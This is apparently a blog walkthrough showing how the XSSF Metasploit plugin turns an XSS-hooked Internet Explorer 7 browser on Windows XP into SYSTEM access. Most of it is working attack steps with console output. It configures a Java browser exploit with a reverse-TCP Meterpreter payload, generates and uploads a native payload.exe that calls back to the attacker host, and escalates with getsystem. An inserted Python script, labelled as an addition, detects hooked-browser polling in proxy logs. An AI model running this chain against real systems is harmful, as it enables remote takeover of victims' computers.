XSSF – From XSS to Root

The Cross-Site Scripting Framework Metasploit plugin can be used to demonstrate the impact of XSS and browser vulnerabilities.

XSSF isn’t officially part of the Metasploit Framework, so you’ll need to download and install it manually.
It only takes a few minutes, and everything you need to get started can be found on the Google Code project page, code.google.com/p/xssf/

After installation XSSF can be run from the Metasploit console.
This demonstration shows the steps required to get SYSTEM access from a hooked victim.
In this case I will be targeting victim 2, who is using Internet Explorer 7 and an older version of Java on Windows XP.

Commands are in italics and notes are bolded in the original; in this text, notes are the lines beginning with //, and everything else is a command or its console output.

Commands:

load xssf

//At this point I browsed to the XSSF test.html page to simulate hooked users.
xssf_victims

Victims
=======

ID  SERVER_ID  IP             ACTIVE  INTERVAL  BROWSER_NAME       BROWSER_VERSION  COOKIE
--  ---------  --             ------  --------  ------------       ---------------  ------
1   1          192.168.23.10  true    5         Google Chrome      28.0.1500.95     YES
2   1          192.168.23.12  true    5         Internet Explorer  7.0              YES

xssf_information 2

INFORMATION ABOUT VICTIM 2
============================
IP ADDRESS : 192.168.23.12
ACTIVE ? : TRUE
FIRST REQUEST : 2013-08-18 21:22:54
LAST REQUEST : 2013-08-18 21:24:54
CONNECTION TIME : 0hr 2min 0sec
BROWSER NAME : Internet Explorer
BROWSER VERSION : 7.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : http://192.168.23.200:8888
XSSF COOKIE ? : YES
RUNNING ATTACK : NONE
WAITING ATTACKS : 0
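
The victim information above shows why a hooked browser is visible on the network side: it polls the XSSF server (LOCATION http://192.168.23.200:8888) at a fixed INTERVAL of 5 seconds for as long as the page stays open. The following script, added here as an illustration and not part of the original post or of XSSF, runs a simple beacon check over web proxy log lines. The log format, the sample lines, the thresholds and all function names are assumptions; it groups requests by (client, server) and flags pairs whose inter-request gaps are short and unusually regular, which is what a hooked browser's polling loop looks like next to human browsing.

```python
"""Beacon detection over proxy logs (added example, not part of the XSSF post).

A browser hooked by XSSF polls the framework server at a fixed interval, so in
a proxy log it shows up as a near-perfectly regular series of requests from
one client to one server.  Log format, sample lines and thresholds are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed sample log: "<date> <time> <client_ip> <method> <url>" (assumed format).
# 192.168.23.12 polls 192.168.23.200:8888 every 5 s; 192.168.23.50 browses normally.
SAMPLE_LOG = """\
2013-08-18 21:22:54 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:22:55 192.168.23.50 GET http://intranet.example/news
2013-08-18 21:22:59 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:23:04 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:23:09 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:23:14 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:23:19 192.168.23.12 GET http://192.168.23.200:8888/
2013-08-18 21:23:30 192.168.23.50 GET http://intranet.example/news/42
2013-08-18 21:24:11 192.168.23.50 GET http://intranet.example/
2013-08-18 21:24:12 192.168.23.50 GET http://intranet.example/style.css
2013-08-18 21:24:54 192.168.23.50 GET http://intranet.example/news/43
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Yield (timestamp, client, server) tuples; server is the host:port of the URL."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip malformed lines instead of crashing on them
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group(2), urlsplit(m.group(4)).netloc


def find_beacons(text, min_requests=5, max_mean_gap=60.0, max_jitter=0.15):
    """Return [(client, server, request_count, mean_gap_seconds)] for short, regular polling."""
    series = defaultdict(list)
    for ts, client, server in parse_log(text):
        series[(client, server)].append(ts)

    findings = []
    for (client, server), times in series.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0 or avg > max_mean_gap:
            continue
        # Coefficient of variation: 0 means perfectly regular; human-driven
        # browsing produces gaps that vary far more than max_jitter.
        if pstdev(gaps) / avg <= max_jitter:
            findings.append((client, server, len(times), round(avg, 1)))
    return findings


if __name__ == "__main__":
    for client, server, count, gap in find_beacons(SAMPLE_LOG):
        print(f"possible hooked browser: {client} -> {server}: {count} requests every ~{gap}s")
```

On the constructed log the only pair flagged is 192.168.23.12 polling 192.168.23.200:8888 every 5 seconds; the intranet browsing from 192.168.23.50 has gaps of 1 to 42 seconds and is ignored. Real XSSF traffic would need the thresholds tuned to the actual log volume, and the same check applies to any hooked-browser framework that drives its victims with a polling loop.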

//From here we can incorporate Metasploit’s exploit modules. I’m choosing the java_atomicreferencearray module, but a number of other modules may work just as well (or better), depending on what the target is vulnerable to.

use exploit/multi/browser/java_atomicreferencearray
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.23.200
set URIPATH xssf
set LHOST 192.168.23.200
exploit -j
jobs

Jobs
====

Id  Name
--  ----
0   Exploit: multi/browser/java_atomicreferencearray

//Here you specify the target victim and the exploit job to be delivered.

xssf_exploit 2 0

[*] Searching Metasploit launched module with JobID = '0'...
[+] A running exploit exists: 'Exploit: multi/browser/java_atomicreferencearray'
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)]

[+] Code 'Exploit: multi/browser/java_atomicreferencearray' sent to victim '2'
[+] Remaining victims to attack: NONE

[*] 192.168.23.200 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.23.200 java_atomicreferencearray - Generated jar to drop (5488 bytes).
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] 192.168.23.200 java_atomicreferencearray - Sending jar
[*] Sending stage (30355 bytes) to 192.168.23.12
[*] Meterpreter session 1 opened (192.168.23.200:4444 -> 192.168.23.12:3128) at 2013-08-18 21:45:23 -0200

show sessions

Active sessions
===============

Id  Type               Information              Connection
--  ----               -----------              ----------
1   meterpreter java/java  victime @ Victim-PC  192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

//The Java Meterpreter does not support getsystem, so we need to create a native Windows Meterpreter binary, upload it and execute it. On Windows this needs to be run from the dev_shell system console:

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe

//Now back to the console. First set up the handler so that it runs in the background:

use exploit/multi/handler
exploit -j

//Now that the listener is running, return to the Meterpreter session to upload and run the binary:

upload C:\\metasploit\\apps\\pro\\msf3\\payload.exe c:

//I was unable to run execute -f, so I brought up a shell and executed the binary from there.

shell
cd c:\
C:\>payload.exe
payload.exe

//Background this session so I can interact with the new, fully functional Meterpreter session.

background
sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: Victim-PC\victim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM